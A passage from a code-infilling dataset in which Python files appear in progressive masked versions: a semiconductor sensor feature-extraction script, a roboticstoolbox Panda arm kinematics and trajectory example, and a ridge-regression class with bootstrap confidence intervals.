3)\n t7 = np.sum((feature_tmp - t1) ** 4) / ((len(feature_tmp) - 1) * t2 **\n 4)\n t8 = t5 / t4\n t9 = t5 / t3\n t10 = t4 / (np.sum(np.abs(feature_tmp)) / len(feature_tmp))\n t11 = t5 / (np.sum(np.abs(feature_tmp)) / len(feature_tmp))\n feature_all.loc[idx, :] = [t1, t2, t3, t4, t5, t6, t7, t8, t9, t10,\n t11, df_tmp.T.time.iloc[0], df_tmp.T.time.iloc[-1], df_tmp.T.\n recipe.iloc[0], df_tmp.T.stage.iloc[0], lot_last]\n list_tmp = []\n idx += 1\n counter = 0\n lot_last = 
lot_tmp\n print(row_tmp)\n", "step-5": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jul 18 13:37:10 2018\n\n@author: ninja1mmm\n\"\"\"\nimport os\nimport numpy as np\nimport pandas as pd\nfrom sklearn import preprocessing\n\ndef file_name(file_dir): \n root_tmp=[]\n dirs_tmp=[]\n files_tmp=[]\n for root, dirs, files in os.walk(file_dir): \n root_tmp.append(root)\n dirs_tmp.append(dirs)\n files_tmp.append(files)\n return root_tmp, dirs_tmp, files_tmp\n \n \nroot = '/home/ninja1mmm/Desktop/phm/data'\nroot_tmp, dirs_tmp, files_tmp = file_name(root)\n\ncombined_all = {}\nfeature_all = pd.DataFrame(columns = ['mean', 'std','root amplitude',\n 'rms','max','skewness','kurtosis',\n 'peak factor','margin','waveform',\n 'pulse','start_time', 'end_time',\n 'recipe', 'stage', 'Lot'])\n#df_check = pd.DataFrame()\n\n# read the first file to test here\nfile_tmp = files_tmp[2][0]\n# iterate through the files if needed\n#for file_tmp in files_tmp[2]:\n \npath_tmp = root_tmp[2]+'/'+file_tmp\ndf = pd.read_pickle(path_tmp)\n#df_tmp = df[df['Lot']==28113]\n#if len(df_tmp)>0:\n# df_tmp = df_tmp.iloc[0,:]\n# df_check = df_check.append(df_tmp)\n #------------------------------------------------------------------------------\n# Crucial step\ndf=df.replace([np.inf, -np.inf], np.nan).dropna()\ndf=df.reset_index(drop=True)\ndf_scaler = preprocessing.MinMaxScaler(feature_range = (0,1))\n\n#------------------------------------------------------------------------------\n \n\n\n\nlot_list = list(set(df.Lot))\n# Check if Lot already existed\nfor key in lot_list:\n if key in combined_all.keys():\n print('The Lot %d in %s already existed in %s' % (key, file_tmp, \n combined_all[key]))\n \n# for tmp in lot_list:\n# combined_all[tmp] = file_tmp\n# Select and save all the wafer processing cycles\nlist_tmp = []\nlot_last = df.Lot[0]\ncounter = 0\nidx = 0\n# Specify the range. 
Here set to 100000 for the ease of test\nfor row_tmp in df.index:\n lot_tmp = df.iloc[row_tmp,:].Lot\n if lot_tmp == lot_last:\n list_tmp.append(df.iloc[row_tmp,:])\n counter += 1\n else:\n df_tmp = pd.concat(list_tmp, axis = 1)\n # lot_last serves as the key, can be changed \n# combined_all[lot_last] = df_tmp.T\n combined_all[df_tmp.T.time.iloc[-1]] = df_tmp.T\n # Calculate mean and save in feature dictionary as an example\n # Normalize the data again because for some parameters we need the local (within cycle) feature\n feature_tmp = df_tmp.T.iloc[:,7:] # Not a correct way, because shutter position also need to be excluded\n feature_tmp = df_scaler.fit_transform(feature_tmp)\n# ------------------------------------------------------------------\n # Add features here. Remember to add new columns when initialzing df\n t1 = np.mean(feature_tmp) \n t2 = np.std(feature_tmp)\n t3 = np.mean(np.sqrt(np.abs(feature_tmp)))**2\n t4 = np.sqrt(np.mean(feature_tmp**2))\n t5 = np.max(feature_tmp)\n t6 = np.sum((feature_tmp-t1)**3)/((len(feature_tmp)-1)*(t2**3))\n t7 = np.sum((feature_tmp-t1)**4)/((len(feature_tmp)-1)*(t2**4))\n t8 = t5/t4\n t9 = t5/t3\n t10 = t4/(np.sum(np.abs(feature_tmp))/len(feature_tmp))\n t11 = t5/(np.sum(np.abs(feature_tmp))/(len(feature_tmp)))\n # Newly added\n \n \n # First order difference\n \n# ---------------------------------------------------------------------\n feature_all.loc[idx,:] = [t1,t2,t3,t4,t5,t6,t7,t8,t9,t10,t11,\n df_tmp.T.time.iloc[0],df_tmp.T.time.iloc[-1],\n df_tmp.T.recipe.iloc[0],df_tmp.T.stage.iloc[0],\n lot_last]\n \n list_tmp = []\n idx += 1\n counter = 0\n lot_last = lot_tmp\n print(row_tmp)\n \n \n \n#------------------------------------------------------------------------------\n\n\n\n\n", "step-ids": [ 0, 2, 3, 4, 5 ] }
[ 0, 2, 3, 4, 5 ]
<|reserved_special_token_0|> <|reserved_special_token_1|> <|reserved_special_token_0|> print(robot) <|reserved_special_token_0|> print(T) <|reserved_special_token_0|> print(sol.q) print(robot.fkine(sol.q)) <|reserved_special_token_0|> robot.plot(qtraj.q, movie='panda1.gif') <|reserved_special_token_0|> print(robot) <|reserved_special_token_0|> env.launch('chrome') env.add(robot) env.start_recording('panda2', 1 / dt) for qk in qtraj.q: robot.q = qk env.step() env.stop_recording() <|reserved_special_token_1|> <|reserved_special_token_0|> robot = rtb.models.DH.Panda() print(robot) T = robot.fkine(robot.qz) print(T) T = SE3(0.7, 0.2, 0.1) * SE3.OA([0, 1, 0], [0, 0, -1]) sol = robot.ikine_LMS(T) print(sol.q) print(robot.fkine(sol.q)) qtraj = rtb.jtraj(robot.qz, sol.q, 50) robot.plot(qtraj.q, movie='panda1.gif') dt = 0.05 robot = rtb.models.URDF.Panda() print(robot) env = swift.Swift() env.launch('chrome') env.add(robot) env.start_recording('panda2', 1 / dt) for qk in qtraj.q: robot.q = qk env.step() env.stop_recording() <|reserved_special_token_1|> from spatialmath import SE3 import roboticstoolbox as rtb import swift robot = rtb.models.DH.Panda() print(robot) T = robot.fkine(robot.qz) print(T) T = SE3(0.7, 0.2, 0.1) * SE3.OA([0, 1, 0], [0, 0, -1]) sol = robot.ikine_LMS(T) print(sol.q) print(robot.fkine(sol.q)) qtraj = rtb.jtraj(robot.qz, sol.q, 50) robot.plot(qtraj.q, movie='panda1.gif') dt = 0.05 robot = rtb.models.URDF.Panda() print(robot) env = swift.Swift() env.launch('chrome') env.add(robot) env.start_recording('panda2', 1 / dt) for qk in qtraj.q: robot.q = qk env.step() env.stop_recording() <|reserved_special_token_1|> # this is the example code from the t0p-level README..d from spatialmath import SE3 import roboticstoolbox as rtb import swift robot = rtb.models.DH.Panda() print(robot) T = robot.fkine(robot.qz) print(T) # IK T = SE3(0.7, 0.2, 0.1) * SE3.OA([0, 1, 0], [0, 0, -1]) sol = robot.ikine_LMS(T) # solve IK, ignore additional outputs print(sol.q) # display 
joint angles # FK shows that desired end-effector pose was achieved print(robot.fkine(sol.q)) qtraj = rtb.jtraj(robot.qz, sol.q, 50) robot.plot(qtraj.q, movie="panda1.gif") # URDF + Swift version dt = 0.050 # simulation timestep in seconds robot = rtb.models.URDF.Panda() print(robot) env = swift.Swift() # instantiate 3D browser-based visualizer env.launch("chrome") # activate it env.add(robot) # add robot to the 3D scene env.start_recording("panda2", 1 / dt) for qk in qtraj.q: # for each joint configuration on trajectory robot.q = qk # update the robot state env.step() # update visualization env.stop_recording() # ffmpeg -i panda2.webm -vf "scale=iw*.5:ih*.5" panda2.gif
flexible
{ "blob_id": "cc1a1491ffbcf470705aeea079faac290dbaa25e", "index": 5965, "step-1": "<mask token>\n", "step-2": "<mask token>\nprint(robot)\n<mask token>\nprint(T)\n<mask token>\nprint(sol.q)\nprint(robot.fkine(sol.q))\n<mask token>\nrobot.plot(qtraj.q, movie='panda1.gif')\n<mask token>\nprint(robot)\n<mask token>\nenv.launch('chrome')\nenv.add(robot)\nenv.start_recording('panda2', 1 / dt)\nfor qk in qtraj.q:\n robot.q = qk\n env.step()\nenv.stop_recording()\n", "step-3": "<mask token>\nrobot = rtb.models.DH.Panda()\nprint(robot)\nT = robot.fkine(robot.qz)\nprint(T)\nT = SE3(0.7, 0.2, 0.1) * SE3.OA([0, 1, 0], [0, 0, -1])\nsol = robot.ikine_LMS(T)\nprint(sol.q)\nprint(robot.fkine(sol.q))\nqtraj = rtb.jtraj(robot.qz, sol.q, 50)\nrobot.plot(qtraj.q, movie='panda1.gif')\ndt = 0.05\nrobot = rtb.models.URDF.Panda()\nprint(robot)\nenv = swift.Swift()\nenv.launch('chrome')\nenv.add(robot)\nenv.start_recording('panda2', 1 / dt)\nfor qk in qtraj.q:\n robot.q = qk\n env.step()\nenv.stop_recording()\n", "step-4": "from spatialmath import SE3\nimport roboticstoolbox as rtb\nimport swift\nrobot = rtb.models.DH.Panda()\nprint(robot)\nT = robot.fkine(robot.qz)\nprint(T)\nT = SE3(0.7, 0.2, 0.1) * SE3.OA([0, 1, 0], [0, 0, -1])\nsol = robot.ikine_LMS(T)\nprint(sol.q)\nprint(robot.fkine(sol.q))\nqtraj = rtb.jtraj(robot.qz, sol.q, 50)\nrobot.plot(qtraj.q, movie='panda1.gif')\ndt = 0.05\nrobot = rtb.models.URDF.Panda()\nprint(robot)\nenv = swift.Swift()\nenv.launch('chrome')\nenv.add(robot)\nenv.start_recording('panda2', 1 / dt)\nfor qk in qtraj.q:\n robot.q = qk\n env.step()\nenv.stop_recording()\n", "step-5": "# this is the example code from the t0p-level README..d\nfrom spatialmath import SE3\nimport roboticstoolbox as rtb\nimport swift\n\nrobot = rtb.models.DH.Panda()\nprint(robot)\nT = robot.fkine(robot.qz)\nprint(T)\n\n# IK\n\nT = SE3(0.7, 0.2, 0.1) * SE3.OA([0, 1, 0], [0, 0, -1])\nsol = robot.ikine_LMS(T) # solve IK, ignore additional outputs\nprint(sol.q) # display joint angles\n# 
FK shows that desired end-effector pose was achieved\nprint(robot.fkine(sol.q))\n\n\nqtraj = rtb.jtraj(robot.qz, sol.q, 50)\nrobot.plot(qtraj.q, movie=\"panda1.gif\")\n\n# URDF + Swift version\ndt = 0.050 # simulation timestep in seconds\nrobot = rtb.models.URDF.Panda()\nprint(robot)\n\nenv = swift.Swift() # instantiate 3D browser-based visualizer\nenv.launch(\"chrome\") # activate it\nenv.add(robot) # add robot to the 3D scene\nenv.start_recording(\"panda2\", 1 / dt)\nfor qk in qtraj.q: # for each joint configuration on trajectory\n robot.q = qk # update the robot state\n env.step() # update visualization\nenv.stop_recording()\n\n# ffmpeg -i panda2.webm -vf \"scale=iw*.5:ih*.5\" panda2.gif\n", "step-ids": [ 0, 1, 2, 3, 4 ] }
[ 0, 1, 2, 3, 4 ]
<|reserved_special_token_0|> class RidgeLinearModel: <|reserved_special_token_0|> <|reserved_special_token_0|> <|reserved_special_token_0|> <|reserved_special_token_0|> <|reserved_special_token_0|> <|reserved_special_token_0|> <|reserved_special_token_0|> <|reserved_special_token_0|> <|reserved_special_token_0|> <|reserved_special_token_0|> <|reserved_special_token_0|> <|reserved_special_token_0|> <|reserved_special_token_0|> def fit(this, x1, x2, y): this.x1 = x1 this.x2 = x2 this.y = y m = x1.shape[0] n = SumOneToN(this.k + 1) this.X = np.ones((m, n)) for i in range(m): for p in range(this.k): for j in range(SumOneToN(p + 2) - SumOneToN(p + 1)): this.X[i][SumOneToN(p + 1) + j] *= x1[i] ** (p + 1 - j ) * x2[i] ** j this.beta = np.linalg.pinv(this.X.T.dot(this.X) + this.lmb * np. identity(n)).dot(this.X.T).dot(y) this.set_updated_to_false() <|reserved_special_token_0|> def get_RSS(this, x1, x2, y): if this.beta is None: print('Error: Model is not fitted.') return None else: y_tilde = this.predict(x1, x2) return RSS(y, this.y_tilde) def get_MSE(this, x1, x2, y): if this.beta is None: print('Error: Model is not fitted.') return None else: y_tilde = this.predict(x1, x2) return MSE(y, y_tilde) <|reserved_special_token_0|> <|reserved_special_token_0|> def get_CI_of_beta(this, percentile=0.95): if this.beta is None: print('Error: Model is not fitted.') return None else: if not this.CIbeta_updated: stdcoeff = st.norm.ppf((1 - percentile) / 2) this.CI_beta = np.zeros((len(this.beta), 2)) for i in range(len(this.beta)): this.CI_beta[i][0] = this.beta[i] + stdcoeff * np.sqrt(this .var_vector[i]) this.CI_beta[i][1] = this.beta[i] - stdcoeff * np.sqrt(this .var_vector[i]) this.CIbeta_updated = True return this.CI_beta def set_updated_to_false(this): covariance_matrix_updated = False var_vector_updated = False y_tilde_updated = False CIbeta_updated = False <|reserved_special_token_1|> <|reserved_special_token_0|> class RidgeLinearModel: <|reserved_special_token_0|> 
<|reserved_special_token_0|> <|reserved_special_token_0|> <|reserved_special_token_0|> <|reserved_special_token_0|> <|reserved_special_token_0|> <|reserved_special_token_0|> <|reserved_special_token_0|> <|reserved_special_token_0|> <|reserved_special_token_0|> <|reserved_special_token_0|> <|reserved_special_token_0|> def __init__(this, lmb, k): this.lmb = lmb this.k = k def fit(this, x1, x2, y): this.x1 = x1 this.x2 = x2 this.y = y m = x1.shape[0] n = SumOneToN(this.k + 1) this.X = np.ones((m, n)) for i in range(m): for p in range(this.k): for j in range(SumOneToN(p + 2) - SumOneToN(p + 1)): this.X[i][SumOneToN(p + 1) + j] *= x1[i] ** (p + 1 - j ) * x2[i] ** j this.beta = np.linalg.pinv(this.X.T.dot(this.X) + this.lmb * np. identity(n)).dot(this.X.T).dot(y) this.set_updated_to_false() def predict(this, x1, x2): if this.beta is None: print('Error: Model is not fitted.') return None else: y = np.ones(x1.shape) * this.beta[0] for p in range(this.k): for j in range(SumOneToN(p + 2) - SumOneToN(p + 1)): y += this.beta[SumOneToN(p + 1) + j] * x1 ** (p + 1 - j ) * x2 ** j return y def get_RSS(this, x1, x2, y): if this.beta is None: print('Error: Model is not fitted.') return None else: y_tilde = this.predict(x1, x2) return RSS(y, this.y_tilde) def get_MSE(this, x1, x2, y): if this.beta is None: print('Error: Model is not fitted.') return None else: y_tilde = this.predict(x1, x2) return MSE(y, y_tilde) def get_R2Score(this, x1, x2, y): if this.beta is None: print('Error: Model is not fitted.') return None else: y_tilde = this.predict(x1, x2) return R2Score(y, y_tilde) def get_variance_of_betas(this, B=20): m = len(this.x1) n = SumOneToN(this.k + 1) betasamples = np.zeros((n, B)) for b in range(B): c = np.random.choice(len(this.x1), len(this.x1)) s_x1 = this.x1[c] s_x2 = this.x2[c] s_y = this.y[c] if len(s_y.shape) == 1: s_y = np.expand_dims(this.y[c], axis=1) s_X = np.ones((m, n)) for i in range(m): for p in range(this.k): for j in range(SumOneToN(p + 2) - SumOneToN(p + 
1)): s_X[i][SumOneToN(p + 1) + j] *= s_x1[i] ** (p + 1 - j ) * s_x2[i] ** j betasamples[:, b] = np.linalg.pinv(s_X.T.dot(s_X) + this.lmb * np.identity(n)).dot(s_X.T).dot(s_y)[:, 0] betameans = betasamples.sum(axis=1, keepdims=True) / B this.var_vector = np.sum((betasamples - betameans) ** 2, axis=1) / B return this.var_vector def get_CI_of_beta(this, percentile=0.95): if this.beta is None: print('Error: Model is not fitted.') return None else: if not this.CIbeta_updated: stdcoeff = st.norm.ppf((1 - percentile) / 2) this.CI_beta = np.zeros((len(this.beta), 2)) for i in range(len(this.beta)): this.CI_beta[i][0] = this.beta[i] + stdcoeff * np.sqrt(this .var_vector[i]) this.CI_beta[i][1] = this.beta[i] - stdcoeff * np.sqrt(this .var_vector[i]) this.CIbeta_updated = True return this.CI_beta def set_updated_to_false(this): covariance_matrix_updated = False var_vector_updated = False y_tilde_updated = False CIbeta_updated = False <|reserved_special_token_1|> <|reserved_special_token_0|> class RidgeLinearModel: covariance_matrix = None covariance_matrix_updated = False beta = None var_vector = None var_vector_updated = False CIbeta = None CIbeta_updated = False x1 = None x2 = None y = None y_tilde = None y_tilde_updated = False def __init__(this, lmb, k): this.lmb = lmb this.k = k def fit(this, x1, x2, y): this.x1 = x1 this.x2 = x2 this.y = y m = x1.shape[0] n = SumOneToN(this.k + 1) this.X = np.ones((m, n)) for i in range(m): for p in range(this.k): for j in range(SumOneToN(p + 2) - SumOneToN(p + 1)): this.X[i][SumOneToN(p + 1) + j] *= x1[i] ** (p + 1 - j ) * x2[i] ** j this.beta = np.linalg.pinv(this.X.T.dot(this.X) + this.lmb * np. 
identity(n)).dot(this.X.T).dot(y) this.set_updated_to_false() def predict(this, x1, x2): if this.beta is None: print('Error: Model is not fitted.') return None else: y = np.ones(x1.shape) * this.beta[0] for p in range(this.k): for j in range(SumOneToN(p + 2) - SumOneToN(p + 1)): y += this.beta[SumOneToN(p + 1) + j] * x1 ** (p + 1 - j ) * x2 ** j return y def get_RSS(this, x1, x2, y): if this.beta is None: print('Error: Model is not fitted.') return None else: y_tilde = this.predict(x1, x2) return RSS(y, this.y_tilde) def get_MSE(this, x1, x2, y): if this.beta is None: print('Error: Model is not fitted.') return None else: y_tilde = this.predict(x1, x2) return MSE(y, y_tilde) def get_R2Score(this, x1, x2, y): if this.beta is None: print('Error: Model is not fitted.') return None else: y_tilde = this.predict(x1, x2) return R2Score(y, y_tilde) def get_variance_of_betas(this, B=20): m = len(this.x1) n = SumOneToN(this.k + 1) betasamples = np.zeros((n, B)) for b in range(B): c = np.random.choice(len(this.x1), len(this.x1)) s_x1 = this.x1[c] s_x2 = this.x2[c] s_y = this.y[c] if len(s_y.shape) == 1: s_y = np.expand_dims(this.y[c], axis=1) s_X = np.ones((m, n)) for i in range(m): for p in range(this.k): for j in range(SumOneToN(p + 2) - SumOneToN(p + 1)): s_X[i][SumOneToN(p + 1) + j] *= s_x1[i] ** (p + 1 - j ) * s_x2[i] ** j betasamples[:, b] = np.linalg.pinv(s_X.T.dot(s_X) + this.lmb * np.identity(n)).dot(s_X.T).dot(s_y)[:, 0] betameans = betasamples.sum(axis=1, keepdims=True) / B this.var_vector = np.sum((betasamples - betameans) ** 2, axis=1) / B return this.var_vector def get_CI_of_beta(this, percentile=0.95): if this.beta is None: print('Error: Model is not fitted.') return None else: if not this.CIbeta_updated: stdcoeff = st.norm.ppf((1 - percentile) / 2) this.CI_beta = np.zeros((len(this.beta), 2)) for i in range(len(this.beta)): this.CI_beta[i][0] = this.beta[i] + stdcoeff * np.sqrt(this .var_vector[i]) this.CI_beta[i][1] = this.beta[i] - stdcoeff * np.sqrt(this 
.var_vector[i]) this.CIbeta_updated = True return this.CI_beta def set_updated_to_false(this): covariance_matrix_updated = False var_vector_updated = False y_tilde_updated = False CIbeta_updated = False <|reserved_special_token_1|> from utilities import SumOneToN, RSS, MSE, R2Score import numpy as np import scipy.stats as st class RidgeLinearModel: covariance_matrix = None covariance_matrix_updated = False beta = None var_vector = None var_vector_updated = False CIbeta = None CIbeta_updated = False x1 = None x2 = None y = None y_tilde = None y_tilde_updated = False def __init__(this, lmb, k): this.lmb = lmb this.k = k def fit(this, x1, x2, y): this.x1 = x1 this.x2 = x2 this.y = y m = x1.shape[0] n = SumOneToN(this.k + 1) this.X = np.ones((m, n)) for i in range(m): for p in range(this.k): for j in range(SumOneToN(p + 2) - SumOneToN(p + 1)): this.X[i][SumOneToN(p + 1) + j] *= x1[i] ** (p + 1 - j ) * x2[i] ** j this.beta = np.linalg.pinv(this.X.T.dot(this.X) + this.lmb * np. identity(n)).dot(this.X.T).dot(y) this.set_updated_to_false() def predict(this, x1, x2): if this.beta is None: print('Error: Model is not fitted.') return None else: y = np.ones(x1.shape) * this.beta[0] for p in range(this.k): for j in range(SumOneToN(p + 2) - SumOneToN(p + 1)): y += this.beta[SumOneToN(p + 1) + j] * x1 ** (p + 1 - j ) * x2 ** j return y def get_RSS(this, x1, x2, y): if this.beta is None: print('Error: Model is not fitted.') return None else: y_tilde = this.predict(x1, x2) return RSS(y, this.y_tilde) def get_MSE(this, x1, x2, y): if this.beta is None: print('Error: Model is not fitted.') return None else: y_tilde = this.predict(x1, x2) return MSE(y, y_tilde) def get_R2Score(this, x1, x2, y): if this.beta is None: print('Error: Model is not fitted.') return None else: y_tilde = this.predict(x1, x2) return R2Score(y, y_tilde) def get_variance_of_betas(this, B=20): m = len(this.x1) n = SumOneToN(this.k + 1) betasamples = np.zeros((n, B)) for b in range(B): c = 
np.random.choice(len(this.x1), len(this.x1)) s_x1 = this.x1[c] s_x2 = this.x2[c] s_y = this.y[c] if len(s_y.shape) == 1: s_y = np.expand_dims(this.y[c], axis=1) s_X = np.ones((m, n)) for i in range(m): for p in range(this.k): for j in range(SumOneToN(p + 2) - SumOneToN(p + 1)): s_X[i][SumOneToN(p + 1) + j] *= s_x1[i] ** (p + 1 - j ) * s_x2[i] ** j betasamples[:, b] = np.linalg.pinv(s_X.T.dot(s_X) + this.lmb * np.identity(n)).dot(s_X.T).dot(s_y)[:, 0] betameans = betasamples.sum(axis=1, keepdims=True) / B this.var_vector = np.sum((betasamples - betameans) ** 2, axis=1) / B return this.var_vector def get_CI_of_beta(this, percentile=0.95): if this.beta is None: print('Error: Model is not fitted.') return None else: if not this.CIbeta_updated: stdcoeff = st.norm.ppf((1 - percentile) / 2) this.CI_beta = np.zeros((len(this.beta), 2)) for i in range(len(this.beta)): this.CI_beta[i][0] = this.beta[i] + stdcoeff * np.sqrt(this .var_vector[i]) this.CI_beta[i][1] = this.beta[i] - stdcoeff * np.sqrt(this .var_vector[i]) this.CIbeta_updated = True return this.CI_beta def set_updated_to_false(this): covariance_matrix_updated = False var_vector_updated = False y_tilde_updated = False CIbeta_updated = False <|reserved_special_token_1|> from utilities import SumOneToN, RSS, MSE, R2Score import numpy as np import scipy.stats as st class RidgeLinearModel: covariance_matrix = None # covariance matrix of the model coefficients covariance_matrix_updated = False beta = None # coefficients of the modelfunction var_vector = None var_vector_updated = False CIbeta = None # confidence interval of betas CIbeta_updated = False x1 = None # first predictor of sampledata x2 = None # second predictor of sampledata y = None # responses of sampledata y_tilde = None # model predictions for x y_tilde_updated = False def __init__(this, lmb, k): this.lmb = lmb # set lambda of model this.k = k # set order of polynomial # This function fits the model to the the sample data # using Ridge regression # # @x: 
array containing predictors # @y: array containing responses # @k: the degree of the polynomial to be fitted to the sample data # @lmb: lambda, determines the emphasize on minimizing the variance # of the model # def fit(this, x1, x2, y): # store x ands y for later computations this.x1 = x1 this.x2 = x2 this.y = y # calculate the dimensions of the design matrix m = x1.shape[0] n = SumOneToN(this.k + 1) # allocate design matrix this.X = np.ones((m, n)) # compute values of design matrix for i in range(m): # vectoriser denne løkka for p in range(this.k): for j in range(SumOneToN(p + 2) - SumOneToN(p + 1)): this.X[i][SumOneToN(p + 1) + j] *= x1[i]**(p + 1 - j)*x2[i]**j # compute linear regression coefficients this.beta = np.linalg.pinv(this.X.T.dot(this.X) + this.lmb*np.identity(n)).dot(this.X.T).dot(y) # stored statistical parameters are no longer valid this.set_updated_to_false() # Predicts and returns the responses of the predictors with # the fitted model if the model is fitted # # @x1: Columnvector containing the first predictor values # @x2: Columnvector containing the second predictor values # def predict(this, x1, x2): if this.beta is None: print("Error: Model is not fitted.") return None else: # allocate meshgrid filled with constant term y = np.ones(x1.shape)*this.beta[0] # compute function values for p in range(this.k): for j in range(SumOneToN(p + 2) - SumOneToN(p + 1)): y += this.beta[SumOneToN(p + 1) + j]*x1**(p+1-j)*x2**j return y # Returns the residuals of the model squared and summed def get_RSS(this, x1, x2, y): if this.beta is None: print("Error: Model is not fitted.") return None else: y_tilde = this.predict(x1, x2) return RSS(y, this.y_tilde) # Returns the mean squared error of the model # given the sample data (x1, x2, y) # # @x1: vector of first predictor # @x2: vector of second predictor # @y: vector of responses # def get_MSE(this, x1, x2, y): if this.beta is None: print("Error: Model is not fitted.") return None else: y_tilde = 
this.predict(x1, x2) return MSE(y, y_tilde) # Returns the R2 score of the model def get_R2Score(this, x1, x2, y): if this.beta is None: print("Error: Model is not fitted.") return None else: y_tilde = this.predict(x1, x2) return R2Score(y, y_tilde) # Computes the sample variance of the coefficients of the model # @B: The number of samples used def get_variance_of_betas(this, B=20): m = len(this.x1) n = SumOneToN(this.k + 1) betasamples = np.zeros((n, B)) for b in range(B): # create bootstrapsample c = np.random.choice(len(this.x1), len(this.x1)) s_x1 = this.x1[c] s_x2 = this.x2[c] s_y = this.y[c] # Next line fixes if y is one-dimensional if (len(s_y.shape)) == 1: s_y = np.expand_dims(this.y[c], axis=1) # allocate design matrix s_X = np.ones((m, n)) # compute values of design matrix for i in range(m): # vectoriser denne løkka for p in range(this.k): for j in range(SumOneToN(p + 2) - SumOneToN(p + 1)): s_X[i][SumOneToN(p + 1) + j] *= s_x1[i]**(p + 1 - j)*s_x2[i]**j betasamples[:,b] = np.linalg.pinv(s_X.T.dot(s_X) + this.lmb*np.identity(n)).dot(s_X.T).dot(s_y)[:, 0] betameans = betasamples.sum(axis=1, keepdims=True)/B # Compute variance vector this.var_vector = np.sum((betasamples - betameans)**2, axis=1)/B return this.var_vector # Returns the confidence interval of the betas def get_CI_of_beta(this, percentile=.95): if this.beta is None: print("Error: Model is not fitted.") return None else: if not this.CIbeta_updated: # stdcoeff is the z-score to the two-sided confidence interval stdcoeff = st.norm.ppf((1-percentile)/2) this.CI_beta = np.zeros((len(this.beta), 2)) for i in range(len(this.beta)): this.CI_beta[i][0] = this.beta[i] + stdcoeff*np.sqrt(this.var_vector[i]) this.CI_beta[i][1] = this.beta[i] - stdcoeff*np.sqrt(this.var_vector[i]) this.CIbeta_updated = True # CI_beta returns a nx2 matrix with each row # representing the confidence interval to the corresponding beta return this.CI_beta def set_updated_to_false(this): covariance_matrix_updated = False 
var_vector_updated = False y_tilde_updated = False CIbeta_updated = False
flexible
{ "blob_id": "a5dcc66ece4e58995fe86c3a399c45975a596b1a", "index": 5836, "step-1": "<mask token>\n\n\nclass RidgeLinearModel:\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def fit(this, x1, x2, y):\n this.x1 = x1\n this.x2 = x2\n this.y = y\n m = x1.shape[0]\n n = SumOneToN(this.k + 1)\n this.X = np.ones((m, n))\n for i in range(m):\n for p in range(this.k):\n for j in range(SumOneToN(p + 2) - SumOneToN(p + 1)):\n this.X[i][SumOneToN(p + 1) + j] *= x1[i] ** (p + 1 - j\n ) * x2[i] ** j\n this.beta = np.linalg.pinv(this.X.T.dot(this.X) + this.lmb * np.\n identity(n)).dot(this.X.T).dot(y)\n this.set_updated_to_false()\n <mask token>\n\n def get_RSS(this, x1, x2, y):\n if this.beta is None:\n print('Error: Model is not fitted.')\n return None\n else:\n y_tilde = this.predict(x1, x2)\n return RSS(y, this.y_tilde)\n\n def get_MSE(this, x1, x2, y):\n if this.beta is None:\n print('Error: Model is not fitted.')\n return None\n else:\n y_tilde = this.predict(x1, x2)\n return MSE(y, y_tilde)\n <mask token>\n <mask token>\n\n def get_CI_of_beta(this, percentile=0.95):\n if this.beta is None:\n print('Error: Model is not fitted.')\n return None\n else:\n if not this.CIbeta_updated:\n stdcoeff = st.norm.ppf((1 - percentile) / 2)\n this.CI_beta = np.zeros((len(this.beta), 2))\n for i in range(len(this.beta)):\n this.CI_beta[i][0] = this.beta[i] + stdcoeff * np.sqrt(this\n .var_vector[i])\n this.CI_beta[i][1] = this.beta[i] - stdcoeff * np.sqrt(this\n .var_vector[i])\n this.CIbeta_updated = True\n return this.CI_beta\n\n def set_updated_to_false(this):\n covariance_matrix_updated = False\n var_vector_updated = False\n y_tilde_updated = False\n CIbeta_updated = False\n", "step-2": "<mask token>\n\n\nclass RidgeLinearModel:\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n 
<mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def __init__(this, lmb, k):\n this.lmb = lmb\n this.k = k\n\n def fit(this, x1, x2, y):\n this.x1 = x1\n this.x2 = x2\n this.y = y\n m = x1.shape[0]\n n = SumOneToN(this.k + 1)\n this.X = np.ones((m, n))\n for i in range(m):\n for p in range(this.k):\n for j in range(SumOneToN(p + 2) - SumOneToN(p + 1)):\n this.X[i][SumOneToN(p + 1) + j] *= x1[i] ** (p + 1 - j\n ) * x2[i] ** j\n this.beta = np.linalg.pinv(this.X.T.dot(this.X) + this.lmb * np.\n identity(n)).dot(this.X.T).dot(y)\n this.set_updated_to_false()\n\n def predict(this, x1, x2):\n if this.beta is None:\n print('Error: Model is not fitted.')\n return None\n else:\n y = np.ones(x1.shape) * this.beta[0]\n for p in range(this.k):\n for j in range(SumOneToN(p + 2) - SumOneToN(p + 1)):\n y += this.beta[SumOneToN(p + 1) + j] * x1 ** (p + 1 - j\n ) * x2 ** j\n return y\n\n def get_RSS(this, x1, x2, y):\n if this.beta is None:\n print('Error: Model is not fitted.')\n return None\n else:\n y_tilde = this.predict(x1, x2)\n return RSS(y, this.y_tilde)\n\n def get_MSE(this, x1, x2, y):\n if this.beta is None:\n print('Error: Model is not fitted.')\n return None\n else:\n y_tilde = this.predict(x1, x2)\n return MSE(y, y_tilde)\n\n def get_R2Score(this, x1, x2, y):\n if this.beta is None:\n print('Error: Model is not fitted.')\n return None\n else:\n y_tilde = this.predict(x1, x2)\n return R2Score(y, y_tilde)\n\n def get_variance_of_betas(this, B=20):\n m = len(this.x1)\n n = SumOneToN(this.k + 1)\n betasamples = np.zeros((n, B))\n for b in range(B):\n c = np.random.choice(len(this.x1), len(this.x1))\n s_x1 = this.x1[c]\n s_x2 = this.x2[c]\n s_y = this.y[c]\n if len(s_y.shape) == 1:\n s_y = np.expand_dims(this.y[c], axis=1)\n s_X = np.ones((m, n))\n for i in range(m):\n for p in range(this.k):\n for j in range(SumOneToN(p + 2) - SumOneToN(p + 1)):\n s_X[i][SumOneToN(p + 1) + j] *= s_x1[i] ** (p + 1 - j\n ) * s_x2[i] ** j\n betasamples[:, b] = 
